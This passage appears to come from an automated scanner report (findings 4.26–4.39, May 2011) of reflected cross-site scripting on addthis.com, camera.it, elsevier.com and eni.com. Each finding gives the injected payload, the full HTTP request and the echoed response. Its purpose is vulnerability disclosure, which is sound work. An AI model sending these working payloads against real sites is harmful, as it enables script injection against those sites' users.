The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c22ac<script>alert(1)</script>da40de6267f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpc22ac<script>alert(1)</script>da40de6267f HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=na3eafmrfnuoijcvtu7l23t2p7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpc22ac<script>alert(1)</script>da40de6267f</strong>
...[SNIP]...

4.26. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b091"-alert(1)-"92e0eaf77ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/9b091"-alert(1)-"92e0eaf77ed HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96059

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/9b091"-alert(1)-"92e0eaf77ed";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

4.27. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.camera.it
Path:   /1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1329'-alert(1)-'a5fb0683740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1?d1329'-alert(1)-'a5fb0683740=1 HTTP/1.1
Host: www.camera.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200 OK
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 1.44166
ETag: "e496177afdae7ff4447e02cf268914b0"
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.7.62 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
Content-Length: 40104
Date: Mon, 02 May 2011 22:30:06 GMT
X-Varnish: 1575083911
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb04
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<!-- view_gr
...[SNIP]...
<![CDATA[
var taber = new XmTaber('agenda_lavori',
{
wi: 295,
queryString: 'd1329'-alert(1)-'a5fb0683740=1'
});

//]]>
...[SNIP]...

4.28. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.camera.it
Path:   /1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2627"><script>alert(1)</script>124a53125c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1?a2627"><script>alert(1)</script>124a53125c0=1 HTTP/1.1
Host: www.camera.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200 OK
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 1.47714
ETag: "ab31a19b0e5381536eb7992baefd6ac6"
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.7.62 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
Content-Length: 40439
Date: Mon, 02 May 2011 22:29:57 GMT
X-Varnish: 1575083881
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb04
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<!-- view_gr
...[SNIP]...
<a href="1?a2627"><script>alert(1)</script>124a53125c0=1&amp;active_slide_262=4" class="prevSlide" title="precedente">
...[SNIP]...

4.29. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22997"%3bf38bccab9aa was submitted in the REST URL parameter 3. This input was echoed as 22997";f38bccab9aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/advproductsearch.cws_home22997"%3bf38bccab9aa HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24428
Set-Cookie: JSESSIONID=0000Tzc0jT3hhNK1M4Lr4GWcVwL:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="+ns_l+" width='1' height='1'>");}
sitestat("http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.advproductsearch&category=cws_home22997";f38bccab9aa");
</script>
...[SNIP]...

4.30. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 was submitted in the REST URL parameter 3. This input was echoed as 78bb0"><img src=a onerror=alert(1)>67f5c92b011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/advproductsearch.cws_home78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:32 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24970
Set-Cookie: JSESSIONID=0000-BYReYR8yxhLAjFkChZIJkl:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.advproductsearch&category=cws_home78bb0"><img src=a onerror=alert(1)>67f5c92b011" width="1" height="1">
...[SNIP]...

4.31. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac was submitted in the REST URL parameter 3. This input was echoed as 711ec'><img src=a onerror=alert(1)>485db6800ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/advproductsearch.cws_home711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24968
Set-Cookie: JSESSIONID=00002FURpPzg7bKWUP9lHpWiGEE:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<LI class="lvl2" id="subItem2" onclick='window.location.href="/wps/find/all_products_browse.cws_home711ec'><img src=a onerror=alert(1)>485db6800ac"'>
...[SNIP]...

4.32. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6beef'><script>alert(1)</script>6a8aa79299f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:30 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18350
Set-Cookie: JSESSIONID=0000-3iLOWqG5wZUSadWSvkeTti:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<a href='/wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1&navopenmenu=3'>
...[SNIP]...

4.33. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7daa0"%3balert(1)//24fac7af3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7daa0";alert(1)//24fac7af3ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/advproductsearch.cws_home?7daa0"%3balert(1)//24fac7af3ed=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:30 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18288
Set-Cookie: JSESSIONID=0000NaRz-vRLRFXUkrLZVh70rOz:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
("This page does not have a printer-friendly version")
                   return
               }
           } else {
               printUrl += pieces[i]
           }
           prvPiece = pieces[i]
       }
       var isTheirParams = "false"
       var qpString = "7daa0";alert(1)//24fac7af3ed=1&7daa0";alert(1)//24fac7af3ed=1"        
       if(qpString.length >
...[SNIP]...

4.34. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b was submitted in the REST URL parameter 3. This input was echoed as 6ff19'><img src=a onerror=alert(1)>6e976a58f0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/subject_area_browse.cws_home6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 25013
Set-Cookie: JSESSIONID=0000WXbl3Gp56KXUmnZV1uMnTNX:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<LI class="lvl2" id="subItem2" onclick='window.location.href="/wps/find/all_products_browse.cws_home6ff19'><img src=a onerror=alert(1)>6e976a58f0b"'>
...[SNIP]...

4.35. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e was submitted in the REST URL parameter 3. This input was echoed as 90f99"><img src=a onerror=alert(1)>9406b9f8f6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/subject_area_browse.cws_home90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:46 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 25015
Set-Cookie: JSESSIONID=0000ssegcLJle5F04Nbyc1eLqaz:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.subject_area_browse&category=cws_home90f99"><img src=a onerror=alert(1)>9406b9f8f6e" width="1" height="1">
...[SNIP]...

4.36. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c03b8"%3b28e045484d9 was submitted in the REST URL parameter 3. This input was echoed as c03b8";28e045484d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/subject_area_browse.cws_homec03b8"%3b28e045484d9 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24501
Set-Cookie: JSESSIONID=0000IqCGtqTnRlkAqBgeR1iBcZg:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="+ns_l+" width='1' height='1'>");}
sitestat("http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.subject_area_browse&category=cws_homec03b8";28e045484d9");
</script>
...[SNIP]...

4.37. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60b28'><script>alert(1)</script>3bb27476df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:42 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=0000rcMiH_yB4nrWwiHnqA0Omt0:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209457

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<a href='/wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1&navopenmenu=3'>
...[SNIP]...

4.38. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e8cf"%3balert(1)//1fe8f7ceeb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8cf";alert(1)//1fe8f7ceeb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/subject_area_browse.cws_home?9e8cf"%3balert(1)//1fe8f7ceeb7=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=0000eJInQ8ymYaOaIpU3u5eS2ZN:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209414

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
("This page does not have a printer-friendly version")
                   return
               }
           } else {
               printUrl += pieces[i]
           }
           prvPiece = pieces[i]
       }
       var isTheirParams = "false"
       var qpString = "9e8cf";alert(1)//1fe8f7ceeb7=1&9e8cf";alert(1)//1fe8f7ceeb7=1"        
       if(qpString.length >
...[SNIP]...

4.39. http://www.eni.com/mobile/page.do [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eni.com
Path:   /mobile/page.do

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c81"><script>alert(1)</script>05d12a7095a was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/page.do?locale=it_ITc2c81"><script>alert(1)</script>05d12a7095a&content=home HTTP/1.1
Host: www.eni.com
Proxy-Connection: keep-alive
Referer: http://www.eni.com/en_IT/home.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
